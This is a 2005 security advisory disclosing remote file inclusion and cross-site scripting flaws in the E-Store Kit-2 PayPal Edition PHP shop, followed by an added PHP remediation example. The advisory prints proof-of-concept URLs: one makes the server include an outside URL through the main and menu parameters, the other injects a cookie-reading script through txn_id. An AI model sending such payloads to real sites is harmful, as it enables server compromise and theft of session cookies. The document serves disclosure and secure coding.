-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Dcrab's Security Advisory
http://icis.digitalparadox.org/~dcrab
http://www.hackerscenter.com/

Severity: High
Title: File inclusion and XSS vulnerability in E-Store Kit-2 PayPal Edition
Date: March 26, 2005

Summary:
There are file inclusion and XSS vulnerabilities in E-Store Kit-2 PayPal Edition.

Proof of Concept Exploits:

http://www.magicscripts.com/demo/ms-pe02/catalog.php?cid=0&sid='%22&sortfield=title&sortorder=ASC&pagenumber=1&main=http://whatismyip.com&menu=http://whatismyip.com

The server fetches and includes http://www.whatismyip.com through the main and menu parameters; with attacker-supplied content in place of that URL this can lead to command execution and compromise of the full system.

http://www.magicscripts.com/demo/ms-pe02/downloadform.php?txn_id="><script>alert(document.cookie)</script>

This pops the cookie.

Possible fix: Using htmlspecialchars() on output and enabling safe mode in php.ini would solve these problems.

Author:
These vulnerabilities have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackersenter[DOT|NOSPAM]com, please feel free to contact me regarding these vulnerabilities. You can find me at http://www.hackerscenter.com or http://icis.digitalparadox.org/~dcrab. Look out for my soon to come out book on Secure coding with PHP.

-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1 - not licensed for commercial use: www.pgp.com

iQA/AwUBQkSH0iZV5e8av/DUEQLQdgCg+jEoan4i1l2fqBK5LXse0+kUXQ4AoKWZ
1d0vpE05jqm5pVr597Zxu9m2
=fGEj
-----END PGP SIGNATURE-----
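The two weaknesses the advisory names are a request-controlled include and unencoded output. The following PHP is an added illustration written for this page, not the E-Store Kit-2 code: it shows the include pattern that lets the main and menu parameters pull in a URL, beside an allowlist version that cannot, and the htmlspecialchars() output encoding the advisory recommends applied to txn_id. The template directory, file names and helper functions are assumptions; only the parameter names come from the advisory.

```php
<?php
// Added example (not the vendor's code). Parameter names `main`, `menu` and
// `txn_id` come from the advisory; template names and helpers are assumed.

// --- Vulnerable pattern (shown for contrast, do not use): the request string
// is passed straight to include, so with allow_url_fopen enabled a URL in
// $_GET['main'] is fetched and executed as PHP.
function render_vulnerable(array $get): void
{
    include $get['main'];
    include $get['menu'];
}

// --- Hardened: request values are keys into a fixed allowlist of local files.
const TEMPLATE_DIR = __DIR__ . '/templates';          // assumed layout
const ALLOWED_TEMPLATES = [
    'catalog'  => 'catalog.inc.php',
    'download' => 'downloadform.inc.php',
];
const ALLOWED_MENUS = [
    'default' => 'menu_default.inc.php',
];

function resolve_template(string $requested, array $allowed, string $fallback): string
{
    // Unknown keys fall back to a known file; the request never supplies
    // a path component or a URL, so there is nothing for a scheme to do.
    $file = $allowed[$requested] ?? $allowed[$fallback];
    return TEMPLATE_DIR . '/' . $file;
}

function render_hardened(array $get): void
{
    include resolve_template($get['main'] ?? 'catalog', ALLOWED_TEMPLATES, 'catalog');
    include resolve_template($get['menu'] ?? 'default', ALLOWED_MENUS, 'default');
}

// --- XSS: encode untrusted values at the point they enter HTML output.
function html_escape(string $value): string
{
    // ENT_QUOTES encodes both " and ', so the value stays inside an attribute
    // such as value="..."; the charset argument must match the page's charset.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function download_form_field(string $txn_id): string
{
    return '<input type="hidden" name="txn_id" value="' . html_escape($txn_id) . '">';
}

// Constructed sample input shaped like the advisory's second PoC: the quote and
// angle brackets are emitted as entities, so no attribute or tag is closed.
echo download_form_field('"><script>alert(document.cookie)</script>'), PHP_EOL;
```

On the interpreter side, the safe mode the advisory suggests was removed in PHP 5.4; the settings that matter for this pattern in current PHP are allow_url_include = Off (the default) and, where nothing on the site needs remote file access, allow_url_fopen = Off, which stop include from fetching a URL at all. The allowlist above is the code-level control that works regardless of those settings.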